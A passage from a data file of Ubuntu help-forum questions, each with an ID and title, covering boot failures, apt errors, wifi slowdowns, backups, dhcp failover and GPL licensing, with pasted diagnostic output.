caddy ( caddy only ) used for installing your own hard drive ( optical drive bay remains as selected ) memory card reader : internal 9-in-1 card reader ( mmc/rsmmc/sd/mini sd/sdhc/sdxc/ms/ms pro/ms duo ) bluetooth : bluetooth included with select wireless cards only ( see “wireless network” section below ) wireless network : sager - intel® advanced-n 6235 - 802.11a/b/g/n wireless lan module + bluetooth™ 4.0 ( sku - s8r111 ) wireless network accessories : no network accessory camera : built in 2.0 megapixel camera sound card : sound blaster compatible 3d audio - included battery : smart li-ion battery ( 8-cell ) fingerprint reader : integrated fingerprint reader keyboard ( internal - laptop ) : standard sager/clevo non chiclet backlit keyboard operating system : no operating system standard - drivers & utility software only i much prefer using ubuntu over windows but it drives me crazy when my os inexplicably just fails to boot for no clear reason after a perfectly good installation -- especially when it booted just fine in the beta ! does anyone know of a solution to this problem ?
297941	.iso program is stuck on notepad and ca n't go back	i downloaded the .iso program and did n't know what to do with it so i opened it with notepad . will it still work on boot ? if not , what do i do ? will notepad still allow it to run on startup ?
297947	i ca n't remove a malformed line from my sources.list.d ?	i tried to follow a poorly explained tutorial on how to install the opera browser from the terminal . after this failed , i have not been able to get to the software center or the software updater . i also get this error message : an error occurred , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : 'error : opening the cache ( e : malformed line 1 in source list /etc/apt/sources.list.d/opera.list ( dist ) , e : the package lists or status file could not be parsed or opened. ) ' . this usually means that your installed packages have unmet dependencies . yes , i 've seen all the other `` malformed line '' threads , but nothing is helping . any help would be greatly appreciated . i am running 13.04 .
297951	black screen on boot ( dvi ) - radeon 9550/9600/x1050 series - lubuntu 13.04	i get no signal after boot , yet when i hit the reset button the boot screen shows . what could be the problem ? thanks monitor : lg flatron w2246t ps : this is no duplicate as i get no black screen when i hit the reset button ... xrandr output screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 4096 x 4096 vga-0 disconnected ( normal left inverted right x axis y axis ) dvi-0 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 477mm x 268mm 1920x1080 60.0*+ 1680x1050 60.0 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 s-video disconnected ( normal left inverted right x axis y axis )
297954	ubuntu 13.04 update and install issue	i 've checked several forums and sites for trying to fix this issue . this issue has been happening for the last three days . i 'm a bit of a newbie to linux but i think i 've managed to narrow down where the issue is . i 've recently been getting an error like this e : gpg error : http : //arcgive.canonical.com raring release : the following signatures were invalid : nodata 1 nodata 2 every time with `` sudo apt-get update '' . also been getting a red warning triangle warning me update information is outdated and may be caused by network issues or outdated repository . after some intense google searching a few people have had a similar issue but it seemed to be with 13.03 . from what i gather , i am missing gpg keys that is causing the issue ( tried resetting them to default in the settings but no luck ) . there was a link to what appeared to be the pgp key for raring release but i ca n't make heads or tails of what to do with it : http : //archive.canonical.com/dists/raring/release.gpg i am really hoping someone here may know what to do . thank you for your help
297958	ubuntur 12.04 - background wallpaper shows portrait photo in landscape orientation	i want to have some portrait-oriented ( longer vertical than horizontal dimensions ) jpg files for my wallpaper , but they keep being displayed in landscape-orientation ( rotated anti-clockwise 90deg ) . the original photos show in correct orientation in image viewer . any answers or ideas ?
297962	how to i add a command to be available from the auto run box for dvd videos ?	in system settings -- > details -- > removable media there are drop downs to let you select what to do when you insert various media types . i 've written some scripts called things like ripmovie and put them in /usr/local/bin they work from the command line correctly . i want them to be available as options in the drop down that appears when you insert a dvd movie . i 've tried selecting `` other application '' but they 're not in the list and you ca n't add new ones . how can i do that ?
297968	how to make revobase package work in r 3.0.1 ?	i have just moved to ubuntu 12.04 lts and i am having a hard time with r packages and installation . i need to use the revobase package . i installed it this way : sudo apt-get install revolution-r sudo apt-get install r-revolution-revobase revobase is in my package list , but when i call it i get : library ( revobase ) error : package ârevobaseâ was built before r 3.0.0 : please re-install it r is up to date ( version 3.0.1 ) . i am not being able to go back to older r versions . does anyone can help me making revobase work in my the current r version ( 3.0.1 ) or help me to go back to a version in which it will work ? thanks
297970	ca n't get wifi connection over 150mbps !	i 'm trying to connect to my new router at a speed of 300mbps . my new wireless router accepts 300mbps in 2.4mhz and 450mbps in 5mhz . i 'm testing right next to the router and i get 150mbps top . i 'm pretty aware of what 150/300/450mbps means in real life , but the thing is that connecting to 150mbps wo n't give anything above 8mbps when transfering files over the network . i tested all the same in windows 7 and i can get links of 300mbps ( fluctuating , but very stable at that speed ) , whit 22mbps for file transfers . is there something i can do ? thank you ! edit : adding some info from terminal commands uname -mr 3.5.0-28-generic i686 lsb_release -d description : ubuntu 12.10 lspci -nnk | grep -ia2 net 02:00.0 network controller [ 0280 ] : intel corporation pro/wireless 5100 agn [ shiloh ] network connection [ 8086:4237 ] subsystem : intel corporation wifi link 5100 agn [ 8086:1211 ] kernel driver in use : iwlwifi -- 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 02 ) subsystem : hewlett-packard company device [ 103c:3624 ] kernel driver in use : r8169 lsmod module size used by ipt_masquerade 12664 0 xt_state 12515 0 ipt_reject 12486 0 xt_tcpudp 12532 0 nf_nat_h323 12810 0 nf_conntrack_h323 51811 1 nf_nat_h323 nf_nat_pptp 12537 0 nf_conntrack_pptp 13554 1 nf_nat_pptp nf_conntrack_proto_gre 13581 1 nf_conntrack_pptp nf_nat_proto_gre 12672 1 nf_nat_pptp nf_nat_tftp 12421 0 nf_conntrack_tftp 12818 1 nf_nat_tftp nf_nat_sip 16946 0 nf_conntrack_sip 24511 1 nf_nat_sip nf_nat_irc 12543 0 nf_conntrack_irc 13113 1 nf_nat_irc nf_nat_ftp 12549 0 nf_conntrack_ftp 13107 1 nf_nat_ftp iptable_nat 12978 0 nf_nat 20317 9 ipt_masquerade , nf_nat_h323 , nf_nat_pptp , nf_nat_proto_gre , nf_nat_tftp , nf_nat_sip , nf_nat_irc , nf_nat_ftp , iptable_nat nf_conntrack_ipv4 14081 3 iptable_nat , nf_nat nf_conntrack 66308 18 ipt_masquerade , xt_state , nf_nat_h323 , nf_conntrack_h 323 , nf_nat_pptp , nf_conntrack_pptp , nf_conntrack_proto_gre , nf_nat_tftp , nf_conntrack_tftp , nf_nat_sip , nf _conntrack_sip , nf_nat_irc , nf_conntrack_irc , nf_nat_ ftp , nf_conntrack_ftp , iptable_nat , nf_nat , nf_conntra ck_ipv4 nf_defrag_ipv4 12650 1 nf_conntrack_ipv4 snd_hrtimer 12649 1 vesafb 13478 1 coretemp 13169 0 arc4 12474 2 joydev 17162 0 hp_wmi 13617 0 sparse_keymap 13659 1 hp_wmi dm_multipath 22403 0 iptable_filter 12707 1 scsi_dh 14214 1 dm_multipath xt_owner 12451 12 ip_tables 17792 2 iptable_nat , iptable_filter x_tables 21936 8 ipt_masquerade , xt_state , ipt_reject , xt_tcpudp , iptable_nat , iptable_filter , xt_owner , ip_tables snd_hda_codec_hdmi 31457 1 uvcvideo 71278 0 videobuf2_core 32071 1 uvcvideo videodev 95842 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12757 1 uvcvideo videobuf2_memops 13213 1 videobuf2_vmalloc ir_lirc_codec 12740 0 lirc_dev 18671 1 ir_lirc_codec microcode 18210 0 ir_mce_kbd_decoder 12636 0 ir_sanyo_decoder 12466 0 snd_hda_codec_idt 59762 1 ir_sony_decoder 12463 0 ir_jvc_decoder 12460 0 psmouse 84878 0 serio_raw 13032 0 ir_rc6_decoder 12460 0 ir_rc5_decoder 12460 0 ir_nec_decoder 12460 0 lpc_ich 16926 0 fglrx 2917043 243 snd_hda_intel 32516 5 snd_hda_codec 111548 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 13273 1 snd_hda_codec snd_seq_midi 13133 0 snd_pcm 80235 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec btusb 17987 0 snd_rawmidi 25383 1 snd_seq_midi snd_seq_midi_event 14476 1 snd_seq_midi rc_rc6_mce 12455 0 snd_seq 51281 3 snd_seq_midi , snd_seq_midi_event ene_ir 17908 0 jmb38x_ms 17178 0 rc_core 21267 11 ir_lirc_codec , ir_mce_kbd_decoder , ir_sanyo_decoder , ir_sony_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_r c5_decoder , ir_nec_decoder , rc_rc6_mce , ene_ir rfcomm 37277 12 snd_timer 24412 3 snd_hrtimer , snd_pcm , snd_seq memstick 15843 1 jmb38x_ms snd_seq_device 14138 3 snd_seq_midi , snd_rawmidi , snd_seq parport_pc 31969 0 bnep 17708 2 iwlwifi 348525 0 wmi 18591 1 hp_wmi snd 62146 21 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_s eq , snd_timer , snd_seq_device video 18895 0 bluetooth 183270 22 btusb , rfcomm , bnep ppdev 12818 0 mac80211 461261 1 iwlwifi hp_accel 25729 0 lis3lv02d 19230 1 hp_accel input_polldev 13649 1 lis3lv02d soundcore 14600 1 snd snd_page_alloc 14037 2 snd_hda_intel , snd_pcm cfg80211 175574 2 iwlwifi , mac80211 mac_hid 13038 0 lp 13300 0 parport 40754 3 parport_pc , ppdev , lp binfmt_misc 17261 1 hid_generic 12485 0 usbhid 41734 0 hid 82179 2 hid_generic , usbhid ahci 25497 3 libahci 25938 1 ahci r8169 55977 0 firewire_ohci 35522 0 sdhci_pci 18156 0 sdhci 27831 1 sdhci_pci firewire_core 57493 1 firewire_ohci crc_itu_t 12628 1 firewire_core dm_raid45 75358 0 xor 26091 1 dm_raid45 dm_mirror 21666 0 dm_region_hash 16013 1 dm_mirror dm_log 18138 3 dm_raid45 , dm_mirror , dm_region_hash iwconfig wlan0 ieee 802.11abgn essid : '' diegosolo5 '' mode : managed frequency:5.18 ghz access point : a0 : f3 : c1:8f:93:6c bit rate=150 mb/s tx-power=14 dbm retry long limit:7 rts thrff fragment thrff power managementn link quality=61/70 signal level=-49 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:269 invalid misc:1714 missed beacon:0 lo no wireless extensions . eth0 no wireless extensions . ifconfig eth0 link encap : ethernet hwaddr 00:26:9e:10 : af:42 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:8698 errors:0 dropped:0 overruns:0 frame:0 tx packets:8698 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:792325 ( 792.3 kb ) tx bytes:792325 ( 792.3 kb ) wlan0 link encap : ethernet hwaddr 00:1e:65:82 : f1:3a inet addr:192.168.0.101 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :21e:65ff : fe82 : f13a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2302128 errors:0 dropped:144 overruns:0 frame:0 tx packets:680971 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3308302832 ( 3.3 gb ) tx bytes:69550481 ( 69.5 mb )
297973	how to make a video for youtube on linux ?	in many youtube videos there is a guy talking something to his laptop and recording a movie with his laptop built-in camera and a microphone . my questions are : 1 ) what program do you recommend to shoot such video in linux ? 2 ) how to get rid of a horrible static noise ? on my hp pavilion i can record sound but when i turn up `` l r capture '' to 100 % in order to gain the best sound volume in output recording i can hear a clear background noise . here http : //superuser.com/questions/362175/how-to-kill-tv-like-static-noise-in-my-linux-microphone someone has said that it 's impossible to remove this sound . but there is no such noise in youtube videos ! how do they do that ?
297984	why is ubuntu 13.04 asking me to upgrade ?	i upgraded to 13.04 shortly after it came out . but this computer still prompts me to upgrade . example : welcome to ubuntu 13.04 ( gnu/linux 3.8.0-21-generic x86_64 ) * documentation : https : //help.ubuntu.com/ 0 packages can be updated . 0 updates are security updates . new release '13.04 ' available . run 'do-release-upgrade ' to upgrade to it . stephane @ acert : ~ $ sudo do-release-upgrade [ sudo ] password for stephane : checking for a new ubuntu release no new release found stephane @ acert : ~ $ cat /etc/issue* ubuntu 13.04 \n \l ubuntu 13.04 why does it keep telling me about 13.04 and to run do-release-upgrade if i 'm already on that version ?
297985	automatically cd into directories ?	in the terminal you use cd ../../ ... ... .. to get to wherever you want , but i am lazy , i am wondering if it is possible to automatically cd into the directories if the command is simply the directory . the terminals obviously know it 's the directory because you get the output of $ ../ bash : ../ : is a directory so is it possible to hijack this message to automatically cd into that directory ?
297988	how do you reinstall wine after upgrading ?	i upgraded from ubuntu 12.04 to ubuntu 13.04 . after doing this , i get this error when trying to reinstall wine : e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? how do you fix a missing archive ? my current interest in wine is some windows midi software . i have a midi uno . it was working before the upgrade but now i am having some trouble .
297989	installing ubuntu 13.04 on virtualbox gives an internal error at the start	installing 32-bit ubuntu with mostly defaults : gives me the following error : i am trying to look for some troubleshooting steps to find what is causing the error . any help would be appreciated
297992	how do i run a script on startup as superuser ?	i want to run a command on startup on my ubuntu server . does anyone know how to do this ? does /etc/rc.local run as superuser ? any help will be appreciated . thanks !
297999	ecrytfs - purpose of private.sig and private.mnt ?	i just switched to ecryptfs and like it in conjunction with incremental backups . but , what i have not understood is what are private.sig and private.mnt files used fore . why should they be kept especially save for backup as well ? could anyone please explain ?
298000	clean install of ubuntu 12.10 not booting	just installed ubuntu 12.10 ( was n't 100 % happy with 13.04 yet ) from a usb drive . i have done this numerous times . this time i did the install three times . i think something was wrong with one flash drive , and the installation hung , so i reinstalled wubi onto another usb drive and did this install again ( wiping everything out each time ) . after this install , the computer does n't boot , and all i get is a black screen with blinking cursor . so i did another fresh install thinking something strange happened , but in the end i got the same result . i have a dell vostro a90 with a runcore 32gb ssd and 2gb ram . i have been using ubuntu full time on this computer since 11.04 and figured it was time for a clean start . i 'm going home to play with it some , but if anyone has any ideas , i 'm obviously not making a lot of progress here .
298001	x forwarding from ubuntu server ed to windows 7	the goal : i would like to open a program from my ubuntu server in my windows 7 desktop . steps taken : putty > ssh > x11 check 'enable port forwarding' i have started vnc viewer in listening mode started putty ssh session apt get install xinit startx & geany ( it 's a c language ide ; it uses the gui so i '' m using it to test x forwarding ) error messages : geany returns `` can not open display '' startx returns `` setversion 1.4 failed '' i 'm working on windows 7 and headless ubuntu server 12.04 lts obviously i forgot something , but i 'm having difficulty figuring out what . the goal is to not use sudo apt get install desktop , since i only want to use one program at a time , and anyway my server is n't hooked up to a monitor . any ideas ? questions ? thanks for your help ! curios
298007	what units does the ntp drift file use ?	when the ntpd daemon is running , the file : /var/lib/ntp/ntp.drift gets updated periodically . example : 17:20 hostname 118 ~ > ls -l /var/lib/ntp/ntp.drift -rw-r -- r -- 1 ntp ntp 7 may 20 16:46 /var/lib/ntp/ntp.drift # so it looks like it was last updated ~34 minutes ago the file has one number in it , for example , looking at a 4 virtual hosts , i find these values , respectively : -22.086 -10.214 -13.669 6.045 i assume these are seconds per day ( ? ) , but not sure . man ntpd mentions a different drift file /etc/ntp.drift which does n't seem to exist . the man page does n't explain what units are being used for the drift . questions : is /etc/ntp.drift actually /var/lib/ntp/ntp.drift on ubuntu ? what units is the drift expressed in ? thanks !
298009	is possible to split an nautilus window in horizontal ?	the window splits vertically when we press the f3 key , it 's possible to split the window horizontally ?
298010	libreoffice text missing in global menu	i have installed the latest version of libreoffice a while ago and i just updated ubuntu 12.04 . when i opened the libreoffice document , the text in the globalmenu is missing and you only see the highlight color selecteing the menu where the text would be .
298011	tf2 crash on startup	i played tf2 this afternoon , like the last 3 month on ubuntu 12.04 i had no problem . i saw there was an update at 18h52 . now the game crash while still in the splash screen : i dont get to the menus . i updated to the experimental nvidia driver like steam is recommended . i also followed the advices on this page : black screen on tf2 on ubuntu 12.04 i ca n't find a way to get back into the game ...
298014	nothing but problems after moving to 13.04	i upgraded from 12.04 to 13.o4 and like every time i perform an upgrade my system was very slow , and if i closed my laptop and put it in suspend then opened it again the display would not come back . ( i am running an hp dv6 laptop quad core with 8 gigs of ram , i do n't dual boot . i run only ubuntu . ) so i backed up my data and wiped my system and installed 13.04 from scratch . it is much speedier but still slower than 12.04 especially booting and shutting down . if i close the lid it goes into suspend but when opened back up the display will not come back . the wireless constantly drops and reconnects . it worked fine under 12.04 . i am randomly getting errors when loading different apps , one time and not getting errors the next . the headphone jack will not work unless i go to a command prompt and launch alsamixer and enable it each and every time i want to use my headphones . please help . any help would be appreciated . i really want 13.04 and the enhancements it has but i ca n't keep working this way . thank you in advance ! !
298016	advantages of alternative kernel	recently i have seen an webupd8 article about an alternative kenrel to the stock ubuntu kernel , the pf-kernel , that supposed increases performance . i am running ubuntu 12.10 using kernel 3.5.0-30 generic , with the elevator=noop tweak as i have the os installed on an ssd , with a separate hdd for data and stuff . will the supposed improvements of the pf-kernel really have an effect on an ssd-based system , or are they more inclined towards hdd performance improvement ? besides , using a laptop , so any changes that harm battery life are not desirable . pf-kernel modifications/patches : -ck patchset with bfs cpu scheduler : con kolivas ' ck1 patchset which includes the bfs scheduler that brings better desktop interactivity and responsiveness ; bfq i/o scheduler : using this patch , the disk should be virtually as responsive as if it was idle , no matter what the load is ( this is available by default in sabayon and cyanogenmod ) ; tuxonice : an alternative suspend / hibernate framework that uses image compression , supports any number of swap partitions and/or files , has the ability to cancel hibernating or restoring the image by pressing escape key and more ; uksm : memory de-duplication ; enhanceio : a driver based on ehanceio ssd caching software derived from facebook 's open source flashcache project that 's useful for using ssds as cache devices for traditional hdds .
298017	ubuntu formatted my hard drive	i am in a very bad situation . initially , i had windows 7 and windows 8 installed on two separate partitions and a third partition for data ( music and such ) . i wanted to install ubuntu 13.04 instead of windows 8 . so i downloaded the image , i booted it up from a usb stick , and i was asked if i wanted to install ubuntu alongside with windows or `` instead of windows 8 '' . and i thought this would just use the windows 8 partition , but it erased my whole hard drive ! i do n't care for my music and most of my documents , but i really need to somehow get at least some of the data back , because i had my final year project for university in there , which i need to demonstrate next week . does anybody have any idea what should i do ?
298018	does installing zram have any advantages on a system without swap ?	running ubuntu 12.10 here , on an 128gb ssd and a 4gb ram system . ever since i installed the os , i realised that i dont need the swap partition , as i never use the hibernate function and rarely run out of ram . however , would installing zram bring any real improvement when ram is full , even if there is no swap partition ?
298019	question regarding the dhcpd.leases file for isc-dhcp-server ( ubuntu 12.04 lts x64 )	backstory : i am in the process of replacing a single debian 3.1 ( sarge ) isc-dhcp-server with 2 ubuntu 12.04 lts x64 servers running isc-dhcp-server in failover mode . i 've been unable to find the answer to this on google , and my internal testing on an empty subnet has yielded interesting results ( please note i 'm relatively new to linux ) : here are my 3 questions : 1 ) should i copy the dhcpd.leases and dhcpd.leases~ files from my debian server to /var/lib/dhcp/ on both of the new servers and then start the dhcp services ? will the files then balance themselves ? 2 ) should i copy the dhcpd.leases and dhcpd.leases~ files to /var/lib/dhcp/ on only the primary failover server , and let the secondary server generate one from scratch after the dhcp services have been started ? 3 ) should i not bother copying the files at all , and let the 2 new ubuntu servers generate the files from scratch in /var/lib/dhcp/ ? tia ! -snipe
298032	netflix white sceen or black screen ubuntu 12.04 need answers	problems with netflix-app after install . i get a white or black screen . the show is apparently running with no video . followed all the automatic procedures for install . looking for an update , patch , fix or a link to one of these please . i have tried a few things listed on other posts but have not found a solution .
298033	i use dd to backup my ubuntu , but the backup image is too large	i use the command dd if=/dev/sda | gzip > /media/test/system_backup.img.gz to backup my disk . but the system_bakcup.img.gz is up to 5gb , and when i compress this file , the system_backup.img is only 3.5gb , please help me !
298044	system image size increased after removing packages	i remastered my system . the output image was of 2.5 gb . so i removed packages about 1gb & then remastered system but now final image is of more than 4 gb . i also tried relinux but it also produces same results . i am using ubuntu 12.04 & want to create installation image similar to default one .
298051	display folder sizes in file manager	in nautilus ( or nemo ) file manager , the `` size '' column shows the filesize for files and the number of items contained in a folder for subdirectories : number of items is not that important for me , it would be more useful if i could make this column show the total size contained under the directory . i had an extension on windows called foldersize which shows what i mean : i think it involved a service which ran in the background monitoring filesystem modifications in order to make sure the column was kept up to date . i am interested to know if there is any similar extension to nautilus , i would also be open to switching to another file manager to get this functionality . i am aware of the disk usage analyser in ubuntu , but what i 'm looking for is a solution with file manager integration .
298054	multimedia configuration	just installed ubuntu 12.04 . back in the day there was an article on ubuntu about how to configure it for multimedia support . is there anything like that now ? if so i ca n't find it . thanks , -- glenn
298055	wifi slows to crawl intel centrino wireless -n 1000	i 've been experiencing sever bandwidth issues with my laptop and was hoping someone could help me resolve them . speedtest.net typically reports my dl rate is ~ 18 mb , upload ~ 2.5 mb and ping ~ 20ms , when i 'm experiencing a slowdown it 's ~ 1 . ~1.5 , 70 , respectively . this slow down only affect my linux installation , all other computers and my windows partition functions fine . my laptop is a lenovo y570 , running ubuntu 12.10 with 3.9.0-030900rc6-generic kernal , and windows 7 . i was experiencing this issue before while using network-manager and switched to wicd , although there has n't been any measure improvement sudo lshw -c network *-network description : ethernet interface product : netlink bcm57781 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 10 serial : [ removed ] capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.130 firmware=sb latency=0 link=no multicast=yes port=twisted pair resources : irq:16 memory : f1800000-f180ffff memory : f1810000-f181ffff memory : f1820000-f18207ff *-network description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:08:00.0 logical name : wlan0 version : 00 serial : [ removed ] width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.9.0-030900rc6-generic firmware=39.31.5.1 build 35138 ip= [ removed ] latency=0 link=yes multicast=yes wireless=ieee 802.11bg resources : irq:58 memory : f1b00000-f1b01fff sudo lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 555m ] ( rev ff ) 07:00.0 ethernet controller : broadcom corporation netlink bcm57781 gigabit ethernet pcie ( rev 10 ) 08:00.0 network controller : intel corporation centrino wireless-n 1000 09:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) 0a:00.0 system peripheral : jmicron technology corp. sd/mmc host controller ( rev 30 ) 0a:00.2 sd host controller : jmicron technology corp. standard sd host controller ( rev 30 ) 0a:00.3 system peripheral : jmicron technology corp. ms host controller ( rev 30 ) 0a:00.4 system peripheral : jmicron technology corp. xd host controller ( rev 30 ) ifconfig eth0 link encap : ethernet hwaddr dc:0e : a1:85:79:65 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 up loopback running mtu:65536 metric:1 rx packets:859 errors:0 dropped:0 overruns:0 frame:0 tx packets:859 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:176313 ( 176.3 kb ) tx bytes:176313 ( 176.3 kb ) virbr0 link encap : ethernet hwaddr b6:24 : f9 : b9:3a:46 inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr 74 : e5:0b : e6:35:86 inet addr:192.168.1.66 bcast:192.168.1.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:28652 errors:0 dropped:0 overruns:0 frame:0 tx packets:21186 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:29047155 ( 29.0 mb ) tx bytes:14690621 ( 14.6 mb ) iwconfig eth0 no wireless extensions . lo no wireless extensions . virbr0 no wireless extensions . wlan0 ieee 802.11bg essid : '' kendalandbergman '' mode : managed frequency:2.462 ghz access point : a8:39:44:4e:05:10 bit rate=11 mb/s tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-34 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:741 missed beacon:0 rfkill list 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 3 : phy1 : wireless lan soft blocked : no hard blocked : no i 've already tried the commands below , which although they made a slight change ( less latency and dl rate up 1 mb ) , i 'm not sure if it was n't just a coincidence . sudo rmmod iwlwifi sudo modprobe iwlwifi 11n_disable=1 any help would be much appreciated !
298056	after logging , the touchpad stops working	i have a dell latitude e6420 laptop . after logging in to my account , the touchpad does n't work and the pointer is frozen . it only does n't work for 1 account . the guest account is fine . anyone know how to resolve this . i saw another post for the mouse , but the question was closed without a solution . any suggestions ? thanks , v
298057	12.04 lts how to get compose key to work ?	12.04 lts i 'm trying to get the portuguese ( brazil ) keyboard layout to work with accents and punctuation . i tried different keys for my compose key ( right ctrl , right alt , left win , etc ... ) , but none are working . i ca n't figure out why . thanks .
298061	ubuntu server 12.10 3g modem connection established but not used	our server has lan ( dhcp ) connection to internal network and 3g ( via usb dongle ) to the internet . the internet access should not be exposed to internal network and vice versa . to be able use 3g modem i followed those two manuals : 3g usb modem not working in 12.04 http : //forums.gentoo.org/viewtopic-t-766982.html now when i do wvdial provider_name the connection is established . the interface is up and has ip , dns etc setup according to ifconfig however whenever i try to ping any public internet server it is still trying to use lan network for it and not ppp interface . how can i solve it ? ps : i 've tried following - put auto ppp0 iface ppp0 inet wvdial into /etc/network/interfaces before auto eth0 and now on start it brings the ppp0 interface up , then i unplug cable from lan and restart , after this it works fine , but if i restart server with lan cable plugged in , it is still using eth0 gateway by default ! the output from ip route show : default via 192.168.1.1 dev p2p1 10.64.64.64 dev ppp0 proto kernel scope link src 172.30.50.98 192.168.1.0/24 dev p2p1 proto kernel scope link src 192.168.1.109 i know there is a way to use route2 to load balance between interfaces , but in all manuals i could find they use static ip and dns , whereas in my case of 3g connection it is not possible to do ...
298062	5 seconds to open firefox in ubuntu 13.04 and instantly in lubuntu 13.04	running atom d2700 ( dual 2.1gh , 2gb mem , 32bit mode ) . when opening any app in ubuntu 13.04 , the display gradually builds up the app window over 5-6 seconds . all the functions work properly , just verrry slow . i loaded lubuntu and the apps open instantly . is unity using a low level video interface because it does n't have the correct driver ? i even tried the latest fedora 18 , and it has the same issue but not quite as bad . i have ubuntu 13.04 on 2 laptops that work great .
298072	ca n't install ubuntu dual boot	i 'm trying to dual boot ubuntu with windows 7 and it 's not intalling .before i got a black screen witha blinking cursor.i added nomodeset and now the problem is i 'm have a grub menu and after i click enter it shows purple screen and then a blck screen.i installed ubuntu long time back it worked fine at that time and i uninstalled it for some reasons.now ca n't uninstall the file .
298074	trying to boot from usb on asus q200e-bhi3t45 just brings me to grub menu	it 's been a struggle every time i 've tried to change my os on this machine . i honestly do n't even know how it works whenever it does . i 've somehow managed to get windows 7 , windows 8 , mint 14 , ubuntu 12.04 , and 12.10 to work at random times but it 's always after struggling with it and googling for random chance fixes and suddenly something clicks and it loads from usb , but 99 % of the time , every time i try to boot from usb to install a distro ( in this case , i 'm trying to get ubuntu-12.04.2-desktop-amd64.iso to work ) my pc just comes up with a grub menu ( `` minimal bash-like blahblahblah - grub > '' ) i do n't know why it works when it works . right now i 've tried everything from with/without fast boot in bios , with/without csm , with/without secure boot , to changing bootx64.efi to bootx64.efi to downloading a new bootx64.efi to copying it to every folder on the usb ... . it makes no sense to me . sorry if this has been asked before but i ca n't find anything
298075	gnu lesser gpl vs gnu gpl	i want to know the difference between gnu lesser gpl and gnu gpl . if i modify a free and open source software and sell it to a customer , do i have to share my modifications with the community as well ? which gpl of the two should i use if i do not want to share my source code modifications with anyone other than my customer ?
